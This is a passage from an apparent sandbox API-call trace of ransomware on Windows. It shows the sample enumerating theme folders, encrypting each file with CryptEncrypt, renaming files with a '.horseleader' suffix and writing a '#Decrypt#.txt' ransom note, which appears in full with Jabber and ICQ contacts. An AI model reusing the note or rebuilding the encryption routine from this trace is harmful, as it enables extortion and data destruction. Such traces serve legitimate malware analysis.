lpSrch=".horseleader") returned 0x0 [0247.602] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.602] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.603] lstrlenW (lpString=".testttjffg") returned 11 [0247.603] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.603] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.603] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.603] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.603] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG") returned 77 [0247.604] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.604] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=37112) returned 1 [0247.604] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.610] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.611] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x40f8, lpOverlapped=0x0) returned 1 [0247.611] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbf08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x40f8, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x40f8, lpOverlapped=0x0) returned 1 [0247.611] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.612] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.612] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.612] CloseHandle (hObject=0x1a4) returned 1 [0247.612] GetProcessHeap () returned 0x780000 [0247.612] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.612] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.horseleader") returned 89 [0247.612] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\thmbnail.png.horseleader")) returned 1 [0247.613] GetProcessHeap () returned 0x780000 [0247.613] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.613] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x90f8, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.613] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.613] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\#Decrypt#.txt") returned 78 [0247.614] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\QUAD\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\quad\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.614] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.614] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.616] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.616] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.616] CloseHandle (hObject=0x158) returned 1 [0247.616] GetProcessHeap () returned 0x780000 [0247.616] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.616] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="RADIAL", cAlternateFileName="")) returned 1 [0247.616] lstrcmpiW (lpString1="RADIAL", lpString2="Windows") returned -1 [0247.616] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL") returned 66 [0247.616] lstrcmpW (lpString1="RADIAL", lpString2=".") returned 1 [0247.616] lstrcmpW (lpString1="RADIAL", lpString2="..") returned 1 [0247.616] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.616] GetProcessHeap () returned 0x780000 [0247.616] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.617] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*") returned 68 [0247.617] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.618] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.618] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\.") returned 68 [0247.618] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.618] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a829930, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d0d0ef0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.618] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.618] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\..") returned 69 [0247.619] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.619] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.619] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x682, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.619] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.619] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 78 [0247.619] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.619] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.619] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.619] lstrlenW (lpString=".testttjffg") returned 11 [0247.619] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.619] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.619] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.620] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.621] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF") returned 78 [0247.621] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.621] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1666) returned 1 [0247.621] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x682, lpOverlapped=0x0) returned 1 [0247.623] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff97e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.623] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x682, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x682, lpOverlapped=0x0) returned 1 [0247.623] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.624] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.624] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.624] CloseHandle (hObject=0x1a4) returned 1 [0247.624] GetProcessHeap () returned 0x780000 [0247.624] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.624] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.horseleader") returned 90 [0247.624] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\preview.gif.horseleader")) returned 1 [0247.625] GetProcessHeap () returned 0x780000 [0247.625] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.625] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c679700, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5a829930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1c679700, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xb75e, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RADIAL.ELM", cAlternateFileName="")) returned 1 [0247.625] lstrcmpiW (lpString1="RADIAL.ELM", lpString2="Windows") returned -1 [0247.625] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM") returned 77 [0247.625] StrStrIW (lpFirst="RADIAL.ELM", lpSrch=".horseleader") returned 0x0 [0247.625] lstrcmpW (lpString1="RADIAL.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.626] lstrcmpW (lpString1="RADIAL.ELM", lpString2="_uninstalling_.png") returned 1 [0247.626] lstrlenW (lpString=".testttjffg") returned 11 [0247.626] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM", lpSrch=".testttjffg") returned 0x0 [0247.626] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.626] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.626] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.627] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM") returned 77 [0247.627] StrStrW (lpFirst="RADIAL.ELM", lpSrch=".txt") returned 0x0 [0247.627] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=46942) returned 1 [0247.627] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.630] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.630] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.630] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.631] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.631] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.631] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x175e, lpOverlapped=0x0) returned 1 [0247.631] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe8a2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.631] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x175e, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x175e, lpOverlapped=0x0) returned 1 [0247.632] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.632] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.632] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.632] CloseHandle (hObject=0x1a4) returned 1 [0247.632] GetProcessHeap () returned 0x780000 [0247.632] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.632] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM.horseleader") returned 89 [0247.632] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\radial\\radial.elm.horseleader")) returned 1 [0247.635] GetProcessHeap () returned 0x780000 [0247.635] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.635] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d0d0ef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x24a, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="RADIAL.INF", cAlternateFileName="")) returned 1 [0247.635] lstrcmpiW (lpString1="RADIAL.INF", lpString2="Windows") returned -1 [0247.635] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF") returned 77 [0247.635] StrStrIW (lpFirst="RADIAL.INF", lpSrch=".horseleader") returned 0x0 [0247.635] lstrcmpW (lpString1="RADIAL.INF", lpString2="#Decrypt#.txt") returned 1 [0247.635] lstrcmpW (lpString1="RADIAL.INF", lpString2="_uninstalling_.png") returned 1 [0247.636] lstrlenW (lpString=".testttjffg") returned 11 [0247.636] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RADIAL\\RADIAL.INF", lpSrch=".testttjffg") returned 0x0 [0247.636] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.636] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 